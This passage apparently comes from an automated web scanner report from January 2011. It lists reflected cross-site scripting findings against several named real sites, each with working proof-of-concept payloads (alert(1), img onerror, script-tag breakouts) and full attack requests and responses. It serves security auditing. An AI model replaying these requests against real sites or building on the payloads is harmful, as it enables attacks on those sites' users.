attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://ads.pointroll.com/PortalServe/ [flash parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the flash request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96119"%3balert(1)//f168ce1767a was submitted in the flash parameter. This input was echoed as 96119";alert(1)//f168ce1767a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1166930O62320101223173924&flash=1096119"%3balert(1)//f168ce1767a&time=4|13:19|-6&redir=http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c?$CTURL$&r=0.09495983109809458 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=7A1A2F29-D5D5-4308-B63E-BE3AD3D2AA86; PRbu=EmUrRNwjG; PRvt=CGJOmEmUrRNwjGACOBBeJOJEmU0MxHpcAAkBAeJHsEmdTjgu6i!DSBBeJBaEmsqeeAmKAGSBCeJC5EmquI3yjbAwiBDeJWGEmrX5yd4zACLBEe; PRgo=BBBAAsJvEBVBF4FRCF-19!BDC_!B!BECb!B!B; PRimp=CA9A0400-789E-8A09-0309-05A001920102; PRca=|AJxY*1039:1|AJd9*1774:1|AJcC*23172:5|AJfG*725:1|AJi6*27:1|AJpL*13875:4|AJn8*424:2|AJpe*396:1|#; PRcp=|AJcCAAB5:3|AJcCAACG:1|AJxYAAQl:1|AJd9AA2c:1|AJcCAGBk:1|AJfGAALh:1|AJi6AAA1:1|AJpLADbn:4|AJn8AAGq:2|AJpeAAGY:1|#; PRpl=|Epn7:1|Epn6:2|FAnn:1|Eyzw:1|Eihq:1|Eoxl:1|EjjU:1|En2h:1|Esyc:2|Esyd:2|EqXr:2|Er3c:1|#; PRcr=|Fy8u:1|Fy8x:1|GAty:1|FwyX:1|Fy9A:3|FsPT:1|FudH:1|FyDo:2|FyKT:2|Fwuw:2|Fyh9:1|#; PRpc=|Epn7Fy8u:1|Epn6Fy9A:2|FAnnFy8x:1|EyzwGAty:1|EihqFwyX:1|EoxlFy9A:1|EjjUFsPT:1|En2hFudH:1|EsycFyDo:2|EsydFyKT:2|EqXrFwuw:2|Er3cFyh9:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 27 Jan 2011 19:25:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1166930' src='http://ads.pointroll.com/PortalServe/?pid=1166930O62320101223173924&cid=1423823&pos=h&redir=http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/
...[SNIP]...
ults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c%3F$CTURL$&time=4|13:19|-6&r=0.09495983109809458&flash=1096119";alert(1)//f168ce1767a&server=polRedir' width='728' height='90' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

3.2. http://ads.pointroll.com/PortalServe/ [r parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the r request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec695"%3balert(1)//d5deaeaae19 was submitted in the r parameter. This input was echoed as ec695";alert(1)//d5deaeaae19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1166930O62320101223173924&flash=10&time=4|13:19|-6&redir=http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c?$CTURL$&r=0.09495983109809458ec695"%3balert(1)//d5deaeaae19 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=7A1A2F29-D5D5-4308-B63E-BE3AD3D2AA86; PRbu=EmUrRNwjG; PRvt=CGJOmEmUrRNwjGACOBBeJOJEmU0MxHpcAAkBAeJHsEmdTjgu6i!DSBBeJBaEmsqeeAmKAGSBCeJC5EmquI3yjbAwiBDeJWGEmrX5yd4zACLBEe; PRgo=BBBAAsJvEBVBF4FRCF-19!BDC_!B!BECb!B!B; PRimp=CA9A0400-789E-8A09-0309-05A001920102; PRca=|AJxY*1039:1|AJd9*1774:1|AJcC*23172:5|AJfG*725:1|AJi6*27:1|AJpL*13875:4|AJn8*424:2|AJpe*396:1|#; PRcp=|AJcCAAB5:3|AJcCAACG:1|AJxYAAQl:1|AJd9AA2c:1|AJcCAGBk:1|AJfGAALh:1|AJi6AAA1:1|AJpLADbn:4|AJn8AAGq:2|AJpeAAGY:1|#; PRpl=|Epn7:1|Epn6:2|FAnn:1|Eyzw:1|Eihq:1|Eoxl:1|EjjU:1|En2h:1|Esyc:2|Esyd:2|EqXr:2|Er3c:1|#; PRcr=|Fy8u:1|Fy8x:1|GAty:1|FwyX:1|Fy9A:3|FsPT:1|FudH:1|FyDo:2|FyKT:2|Fwuw:2|Fyh9:1|#; PRpc=|Epn7Fy8u:1|Epn6Fy9A:2|FAnnFy8x:1|EyzwGAty:1|EihqFwyX:1|EoxlFy9A:1|EjjUFsPT:1|En2hFudH:1|EsycFyDo:2|EsydFyKT:2|EqXrFwuw:2|Er3cFyh9:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 27 Jan 2011 19:25:55 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1166930' src='http://ads.pointroll.com/PortalServe/?pid=1166930O62320101223173924&cid=1423823&pos=h&redir=http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/
...[SNIP]...
searchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c%3F$CTURL$&time=4|13:19|-6&r=0.09495983109809458ec695";alert(1)//d5deaeaae19&flash=10&server=polRedir' width='728' height='90' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

3.3. http://ads.pointroll.com/PortalServe/ [redir parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db52a"-alert(1)-"6c059e5e36d was submitted in the redir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1166930O62320101223173924&flash=10&time=4|13:19|-6&redir=http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c?$CTURL$db52a"-alert(1)-"6c059e5e36d&r=0.09495983109809458 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=7A1A2F29-D5D5-4308-B63E-BE3AD3D2AA86; PRbu=EmUrRNwjG; PRvt=CGJOmEmUrRNwjGACOBBeJOJEmU0MxHpcAAkBAeJHsEmdTjgu6i!DSBBeJBaEmsqeeAmKAGSBCeJC5EmquI3yjbAwiBDeJWGEmrX5yd4zACLBEe; PRgo=BBBAAsJvEBVBF4FRCF-19!BDC_!B!BECb!B!B; PRimp=CA9A0400-789E-8A09-0309-05A001920102; PRca=|AJxY*1039:1|AJd9*1774:1|AJcC*23172:5|AJfG*725:1|AJi6*27:1|AJpL*13875:4|AJn8*424:2|AJpe*396:1|#; PRcp=|AJcCAAB5:3|AJcCAACG:1|AJxYAAQl:1|AJd9AA2c:1|AJcCAGBk:1|AJfGAALh:1|AJi6AAA1:1|AJpLADbn:4|AJn8AAGq:2|AJpeAAGY:1|#; PRpl=|Epn7:1|Epn6:2|FAnn:1|Eyzw:1|Eihq:1|Eoxl:1|EjjU:1|En2h:1|Esyc:2|Esyd:2|EqXr:2|Er3c:1|#; PRcr=|Fy8u:1|Fy8x:1|GAty:1|FwyX:1|Fy9A:3|FsPT:1|FudH:1|FyDo:2|FyKT:2|Fwuw:2|Fyh9:1|#; PRpc=|Epn7Fy8u:1|Epn6Fy9A:2|FAnnFy8x:1|EyzwGAty:1|EihqFwyX:1|EoxlFy9A:1|EjjUFsPT:1|En2hFudH:1|EsycFyDo:2|EsydFyKT:2|EqXrFwuw:2|Er3cFyh9:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 27 Jan 2011 19:25:55 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1166930' src='http://ads.pointroll.com/PortalServe/?pid=1166930O62320101223173924&cid=1423823&pos=h&redir=http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c%3F$CTURL$db52a"-alert(1)-"6c059e5e36d&time=4|13:19|-6&r=0.09495983109809458&flash=10&server=polRedir' width='728' height='90' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

3.4. http://ads.pointroll.com/PortalServe/ [time parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the time request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93bab"%3balert(1)//ee44a590352 was submitted in the time parameter. This input was echoed as 93bab";alert(1)//ee44a590352 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1166930O62320101223173924&flash=10&time=4|13:19|-693bab"%3balert(1)//ee44a590352&redir=http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c?$CTURL$&r=0.09495983109809458 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=7A1A2F29-D5D5-4308-B63E-BE3AD3D2AA86; PRbu=EmUrRNwjG; PRvt=CGJOmEmUrRNwjGACOBBeJOJEmU0MxHpcAAkBAeJHsEmdTjgu6i!DSBBeJBaEmsqeeAmKAGSBCeJC5EmquI3yjbAwiBDeJWGEmrX5yd4zACLBEe; PRgo=BBBAAsJvEBVBF4FRCF-19!BDC_!B!BECb!B!B; PRimp=CA9A0400-789E-8A09-0309-05A001920102; PRca=|AJxY*1039:1|AJd9*1774:1|AJcC*23172:5|AJfG*725:1|AJi6*27:1|AJpL*13875:4|AJn8*424:2|AJpe*396:1|#; PRcp=|AJcCAAB5:3|AJcCAACG:1|AJxYAAQl:1|AJd9AA2c:1|AJcCAGBk:1|AJfGAALh:1|AJi6AAA1:1|AJpLADbn:4|AJn8AAGq:2|AJpeAAGY:1|#; PRpl=|Epn7:1|Epn6:2|FAnn:1|Eyzw:1|Eihq:1|Eoxl:1|EjjU:1|En2h:1|Esyc:2|Esyd:2|EqXr:2|Er3c:1|#; PRcr=|Fy8u:1|Fy8x:1|GAty:1|FwyX:1|Fy9A:3|FsPT:1|FudH:1|FyDo:2|FyKT:2|Fwuw:2|Fyh9:1|#; PRpc=|Epn7Fy8u:1|Epn6Fy9A:2|FAnnFy8x:1|EyzwGAty:1|EihqFwyX:1|EoxlFy9A:1|EjjUFsPT:1|En2hFudH:1|EsycFyDo:2|EsydFyKT:2|EqXrFwuw:2|Er3cFyh9:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 27 Jan 2011 19:25:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1166930' src='http://ads.pointroll.com/PortalServe/?pid=1166930O62320101223173924&cid=1423823&pos=h&redir=http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/
...[SNIP]...
yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c%3F$CTURL$&time=4|13:19|-693bab";alert(1)//ee44a590352&r=0.09495983109809458&flash=10&server=polRedir' width='728' height='90' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

3.5. http://govguru.com/north-carolina/boat-registration [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://govguru.com
Path:   /north-carolina/boat-registration

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c938"><img%20src%3da%20onerror%3dalert(1)>d183c434106 was submitted in the REST URL parameter 1. This input was echoed as 5c938"><img src=a onerror=alert(1)>d183c434106 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /north-carolina5c938"><img%20src%3da%20onerror%3dalert(1)>d183c434106/boat-registration HTTP/1.1
Host: govguru.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.6
Vary: Accept-Encoding
Cache-Control: max-age=18000
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Jan 2011 19:42:29 GMT
Keep-Alive: timeout=5, max=100
Expires: Fri, 28 Jan 2011 00:42:29 GMT
Connection: close
Set-Cookie: symfony=va581us05gjud7elcnd7ekr5j1; path=/
Set-Cookie: siteHost=http://govguru.com; path=/; domain=.govguru.com
X-Powered-By: PHP/5.2.6
Content-Length: 21666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

       
   <meta http-equiv="Con
...[SNIP]...
<input class="text" type="text" name="q" value="north carolina5c938"><img src=a onerror=alert(1)>d183c434106 boat registration" />
...[SNIP]...

3.6. http://govguru.com/north-carolina/boat-registration [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://govguru.com
Path:   /north-carolina/boat-registration

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43a93"%3bcea0d4b1bdb was submitted in the REST URL parameter 1. This input was echoed as 43a93";cea0d4b1bdb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /north-carolina43a93"%3bcea0d4b1bdb/boat-registration HTTP/1.1
Host: govguru.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.6
Vary: Accept-Encoding
Cache-Control: max-age=18000
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Jan 2011 19:42:31 GMT
Keep-Alive: timeout=5, max=97
Expires: Fri, 28 Jan 2011 00:42:31 GMT
Connection: close
Set-Cookie: symfony=94mbeh70dbhilfe1imdevta5g1; path=/
Set-Cookie: siteHost=http://govguru.com; path=/; domain=.govguru.com
X-Powered-By: PHP/5.2.6
Content-Length: 21214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

       
   <meta http-equiv="Con
...[SNIP]...
<!--
s.pageName="All States Search north carolina43a93";cea0d4b1bdb boat registration";
s.eVar1=s.prop1="govguru.com";
s.eVar2=s.prop2="Search";
s.eVar3=s.prop3="north carolina43a93\";cea0d4b1bdb boat registration";
s.eVar4=s.prop4="All States";
s.eVar5="north carolin
...[SNIP]...

3.7. http://govguru.com/north-carolina/boat-registration [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://govguru.com
Path:   /north-carolina/boat-registration

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 671f2"%3b9efa48339dd was submitted in the REST URL parameter 2. This input was echoed as 671f2";9efa48339dd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /north-carolina/boat-registration671f2"%3b9efa48339dd HTTP/1.1
Host: govguru.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.6
Vary: Accept-Encoding
Cache-Control: max-age=18000
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Jan 2011 19:43:15 GMT
Keep-Alive: timeout=5, max=96
Expires: Fri, 28 Jan 2011 00:43:15 GMT
Connection: close
Set-Cookie: symfony=1qd7onvan34ppanldsl4or64j4; path=/
Set-Cookie: siteHost=http://govguru.com; path=/; domain=.govguru.com
X-Powered-By: PHP/5.2.6
Content-Length: 20473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

       
   <meta http-equiv="Con
...[SNIP]...
<!--
s.pageName="All States Search boat registration671f2";9efa48339dd";
s.eVar1=s.prop1="govguru.com";
s.eVar2=s.prop2="Search";
s.eVar3=s.prop3="boat registration671f2\";9efa48339dd";
s.eVar4=s.prop4="All States";
s.eVar5="boat registration671f2\";9efa48339dd";


s.cha
...[SNIP]...

3.8. http://govguru.com/north-carolina/boat-registration [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://govguru.com
Path:   /north-carolina/boat-registration

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d091"><img%20src%3da%20onerror%3dalert(1)>097a291560e was submitted in the REST URL parameter 2. This input was echoed as 1d091"><img src=a onerror=alert(1)>097a291560e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /north-carolina/boat-registration1d091"><img%20src%3da%20onerror%3dalert(1)>097a291560e HTTP/1.1
Host: govguru.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.6
Vary: Accept-Encoding
Cache-Control: max-age=18000
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Jan 2011 19:43:13 GMT
Keep-Alive: timeout=5, max=99
Expires: Fri, 28 Jan 2011 00:43:13 GMT
Connection: close
Set-Cookie: symfony=f8pnd0qn4huae44nobtshdqf45; path=/
Set-Cookie: siteHost=http://govguru.com; path=/; domain=.govguru.com
X-Powered-By: PHP/5.2.6
Content-Length: 20574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

       
   <meta http-equiv="Con
...[SNIP]...
<input class="text" type="text" name="q" value="boat registration1d091"><img src=a onerror=alert(1)>097a291560e" />
...[SNIP]...

3.9. http://govguru.com/north-carolina/boat-registration [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://govguru.com
Path:   /north-carolina/boat-registration

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 66345'><script>alert(1)</script>658c07cccb0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /north-carolina/boat-registration?66345'><script>alert(1)</script>658c07cccb0=1 HTTP/1.1
Host: govguru.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.6
Vary: Accept-Encoding
Cache-Control: max-age=18000
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Jan 2011 19:41:58 GMT
Keep-Alive: timeout=5, max=92
Expires: Fri, 28 Jan 2011 00:41:58 GMT
Connection: close
Set-Cookie: symfony=2p103sls2khnubnvrh7r3sm8n2; path=/
Set-Cookie: loc-1=%2Fnorth-carolina; path=/
Set-Cookie: siteHost=http://govguru.com; path=/; domain=.govguru.com
X-Powered-By: PHP/5.2.6
Content-Length: 93416

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

       
   <meta http-equiv="Con
...[SNIP]...
<option value='/boat-registration?66345'><script>alert(1)</script>658c07cccb0=1' >
...[SNIP]...

3.10. http://govguru.com/north-carolina/boat-registration [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://govguru.com
Path:   /north-carolina/boat-registration

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89d43"><script>alert(1)</script>e70e52d1510 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /north-carolina/boat-registration?89d43"><script>alert(1)</script>e70e52d1510=1 HTTP/1.1
Host: govguru.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.6
Vary: Accept-Encoding
Cache-Control: max-age=18000
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Jan 2011 19:41:53 GMT
Keep-Alive: timeout=5, max=64
Expires: Fri, 28 Jan 2011 00:41:53 GMT
Connection: close
Set-Cookie: symfony=9r2r7aqn70j46rbc3dsh950qp0; path=/
Set-Cookie: loc-1=%2Fnorth-carolina; path=/
Set-Cookie: siteHost=http://govguru.com; path=/; domain=.govguru.com
X-Powered-By: PHP/5.2.6
Content-Length: 93590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

       
   <meta http-equiv="Con
...[SNIP]...
<a href="/boat-registration?89d43"><script>alert(1)</script>e70e52d1510=1" title="U.S. Boat Registration">
...[SNIP]...

3.11. http://hire.jobvite.com/CompanyJobs/Careers.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hire.jobvite.com
Path:   /CompanyJobs/Careers.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7246e</script><script>alert(1)</script>0b363216a36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh&7246e</script><script>alert(1)</script>0b363216a36=1 HTTP/1.1
Host: hire.jobvite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=nc5bqb45d2gjpv2j3d3qgwfc; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: guestidc=8e125cb6-e875-4356-a3f3-ea1fa0da79e7; expires=Sat, 26-Feb-2011 19:13:22 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 27 Jan 2011 19:13:22 GMT
Connection: close
Content-Length: 46859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<link href="http://hire.jo
...[SNIP]...
<!--
jvurlargs = '?c=qXY9VfwJ&7246e</script><script>alert(1)</script>0b363216a36=1&cs=93q9Vfwh&su=fsY9Vfwe';
jvurlargsclean = '?c=qXY9VfwJ&7246e</script>
...[SNIP]...

3.12. http://jqueryui.com/themeroller/ [bgColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

